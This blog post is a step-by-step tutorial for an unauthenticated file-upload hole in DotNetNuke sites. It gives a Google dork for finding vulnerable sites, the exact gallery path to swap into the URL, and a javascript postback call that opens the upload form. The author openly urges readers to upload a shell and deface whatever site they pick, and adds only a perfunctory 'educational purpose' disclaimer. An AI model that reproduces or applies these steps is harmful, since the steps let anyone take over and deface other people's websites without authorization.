Lets first get some brief info about DNN.
Dot Net Nuke (DNN) is an open source Portal and Content Management Framework and uses .NET platform. It offers framework for the development of a wide range of commercial portal application.
It allows admins to work effectively with add-ons, third party assemblies and custom tools.
There"s a hole in this CMS which allows any1 to upload any data in the root. You can upload shell in the site and with the help of that can deface that site !!!
So the method goes here:
This method is also known as DNN (DotNetNuke) Gallery All Version Remote File Upload without Authentication.
1st find a DNN site.
The google dork to find this type of site is :
:inurl:/tabid/36/language/en-US/Default.aspx
See the result and choose any1 site of your choice.
You will see /Home/tabid/36/Language/en-US/Default.aspx in the url.
Jst replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx .
Now u will enter into the gallery page.
Now Select
File ( A File On Your Site )
javascript:__doPostBack('ctlURL$cmdUpload','')
Now you will see the upload option.
Then Put This In End Of URL:
portals/0/yourfile.yourfile format
You will see your file.
Your Done Enjoy !!!
For the sake of tutorial i had uploaded a .txt in the root. Above is the screen shot of that only.
NOTE: The above tutorial is only for educational purpose. Do not use it for illegal purpose.
0 comments:
Post a Comment